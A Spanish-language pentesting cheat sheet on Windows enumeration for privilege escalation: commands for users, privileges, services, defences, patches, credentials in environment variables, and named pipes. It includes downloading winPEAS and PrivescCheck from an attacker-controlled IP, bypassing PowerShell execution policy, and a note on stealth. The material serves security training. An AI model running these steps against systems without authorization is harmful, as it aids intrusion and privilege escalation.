Skip to content

Enumeración del Sistema Windows

Información del Usuario

powershell
whoami
hostname
whoami /user
whoami /groups
whoami /groups /fo list

Información del Sistema Operativo

powershell
systeminfo
[environment]::OSVersion.Version
Get-WmiObject -Class win32_operatingsystem

Versión Exacta de Windows

powershell
wmic os get buildnumber
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
systeminfo | findstr /i "build"

Información de Red

powershell
ipconfig /all
ipconfig
route print
netstat -r
netstat -ano
netstat -anob
Get-NetTCPConnection -State Listen | Select-Object LocalAddress, LocalPort, OwningProcess
arp -a

Security Identifiers (SID)

Windows usa SIDs para identificar usuarios, grupos y recursos. Entenderlos es clave para escalada de privilegios.

Estructura de SID

S-1-5-21-1336799502-1441772794-948155058-1001
│ │ │  │    │           │            │           │
│ │ │  │    │           │            │           └─ RID (Relative ID)
│ │ │  │    │           │            └──────────── Autoridad del dominio
│ │ │  │    └───────────┴─────────────────────────  Sub-autoridades
│ │ │  └──────────────────────────────────────────  Autoridad identificadora (5=NT Authority)
│ │ └─────────────────────────────────────────────  Revisión (siempre 1)
│ └───────────────────────────────────────────────  "S" = es un SID
└─────────────────────────────────────────────────  Prefijo obligatorio

SIDs Comunes (Built-in)

powershell
S-1-5-18    = SYSTEM (Local System)
S-1-5-19    = LOCAL SERVICE
S-1-5-20    = NETWORK SERVICE
S-1-5-32-544 = BUILTIN\Administrators
S-1-5-32-545 = BUILTIN\Users
S-1-5-32-551 = BUILTIN\Backup Operators

Ver SID del Usuario Actual

powershell
whoami /user

# Resultado:
# User Name         SID
# ================= =======================================
# dominio\usuario   S-1-5-21-1336799502-1441772794-948155058-1001

Encontrar SID de otro usuario

powershell
Get-LocalUser | Select-Object Name, SID

# O via PowerShell
$user = New-Object System.Security.Principal.NTAccount("dominio", "usuario")
$sid = $user.Translate([System.Security.Principal.SecurityIdentifier])
$sid.Value

# Resultado: S-1-5-21-1336799502-1441772794-948155058-1001

Grupos Locales

powershell
net localgroup
Get-LocalGroup
net localgroup Administrators
Get-LocalGroupMember -Group "Administrators"
Get-LocalGroupMember "Backup Operators"
Get-LocalGroupMember "Remote Desktop Users"
Get-LocalGroupMember "Remote Management Users"
Get-LocalGroupMember "Event Log Readers"
Get-LocalGroupMember "DnsAdmins"
Get-LocalGroupMember "Print Operators"
Get-LocalGroupMember "Server Operators"

Privilegios del Usuario Actual

powershell
whoami /priv
whoami /priv /fo list
whoami /priv | findstr /i "SeBackup\|SeRestore\|SeTakeOwnership\|SeImpersonate\|SeAssignPrimaryToken\|SeLoadDriver\|SeDebugPrivilege"

Servicios en Ejecución

powershell
Get-CimInstance -ClassName win32_service | Select Name, State, PathName | Where-Object {$_.State -like 'Running'}
Get-Service <service_name>
sc query <service_name>
sc qc <service_name>
wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
Get-CimInstance -ClassName win32_service | Where-Object {$_.PathName -notlike 'C:\Windows\*'} | Select Name, PathName, StartName, State
Get-CimInstance -ClassName win32_service | Where-Object {$_.StartName -like "*SYSTEM*" -or $_.StartName -like "*LocalService*"} | Select Name, PathName, StartName

Procesos en Ejecución

powershell
Get-Process
Get-Process | Select-Object Name, Id, Handles, CPU, Memory
tasklist
tasklist /svc
Get-Process -IncludeUserName | Select-Object ProcessName, Id, UserName
Get-Process -Name <process_name>
Get-Process <process_name> | Select-Object *

Protecciones del Sistema

powershell
Get-MpComputerStatus
Get-MpComputerStatus | Select-Object RealTimeProtectionEnabled, BehaviorMonitorEnabled, IoavProtectionEnabled
Get-MpComputerStatus | Select-Object AMServiceEnabled, AntivirusEnabled, AntispywareEnabled, OnAccessProtectionEnabled
Get-AppLockerPolicy -Effective | Select-Object -ExpandProperty RuleCollections
Get-AppLockerPolicy -Local | Test-AppLockerPolicy -path C:\Windows\System32\cmd.exe -User Everyone
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\" /v EnableLUA
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\" /v ConsentPromptBehaviorAdmin
Confirm-SecureBootUEFI

Parches y Actualizaciones

powershell
Get-HotFix | ft -AutoSize
wmic qfe list brief
Get-CimInstance -Class win32_quickfixengineering | Select HotFixID, Description, InstalledOn
Get-CimInstance -Class win32_quickfixengineering | Where-Object { $_.Description -eq "Security Update" }

Aplicaciones Instaladas

powershell
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname, displayversion
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname, displayversion
wmic product get name, version, vendor
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | Where-Object {$_.DisplayName -like "*Java*"}

Puertos Abiertos

powershell
netstat -ano | findstr LISTENING
Get-NetTCPConnection -State Listen | Select-Object LocalAddress, LocalPort, OwningProcess
netstat -ano | findstr :3306
tasklist | findstr <PID>

Named Pipes

powershell
Get-ChildItem \\.\pipe\
accesschk.exe -accepteula \\.\Pipe\lsass -v
accesschk.exe -accepteula -w \pipe\<pipe_name> -v

Variables de Entorno

powershell
Get-ChildItem env:
$env:PATH
$env:USERPROFILE
$env:TEMP
$env:USERNAME
echo %TEMP%
echo %USERPROFILE%
Get-ChildItem env: | Select-Object Name, Value | where {$_.Value -like "*password*" -or $_.Value -like "*credential*"}

Información del Computador

powershell
Get-ComputerInfo
Get-ComputerInfo | Select-Object WindowsProductName, WindowsVersion, WindowsBuildLabEx

Memoria y CPU

powershell
Get-WmiObject Win32_ComputerSystem | Select-Object TotalPhysicalMemory
Get-WmiObject Win32_OperatingSystem | Select-Object TotalVisibleMemorySize, FreePhysicalMemory
Get-WmiObject Win32_Processor | Select-Object Name, NumberOfCores, NumberOfLogicalProcessors

Registro del Sistema - Variables Sensibles

powershell
reg query HKCU\Environment
reg query HKLM\System\CurrentControlSet\Control\Session\ Manager\Environment

Herramientas Automatizadas de Enumeración

WinPEAS

powershell
# Descargar
iwr -uri http://192.168.1.100/winPEASx64.exe -OutFile winpeas.exe

# Ejecutar y guardar salida
.\winpeas.exe > output.txt

# Ver con colores
.\winpeas.exe | More

Qué buscar en salida de WinPEAS:

  • Rojo: Privs elevables, servicios vulnerables, archivos sensibles
  • Verde: Protecciones habilitadas (no explotables)
  • Cyan: Usuarios activos
  • Azul: Usuarios deshabilitados

PrivescCheck

powershell
# Descargar
iwr -uri http://192.168.1.100/PrivescCheck.ps1 -OutFile PrivescCheck.ps1

# Bypass de política de ejecución
Set-ExecutionPolicy Bypass -Scope process -Force
powershell -ep bypass

# Importar y ejecutar
. .\PrivescCheck.ps1
Invoke-PrivescCheck

WES-NG (Windows Exploit Suggester)

Se ejecuta en tu máquina Kali, NO en el objetivo (más sigiloso)

bash
# En Kali - Instalación
git clone https://github.com/bitsadmin/wesng.git
cd wesng
python3 wes.py --update

# En objetivo - Obtener información
systeminfo > sysinfo.txt

# Transferir a Kali
scp usuario@objetivo:sysinfo.txt .

# Analizar en Kali
python3 wes.py sysinfo.txt

# Resultado: lista de CVEs aplicables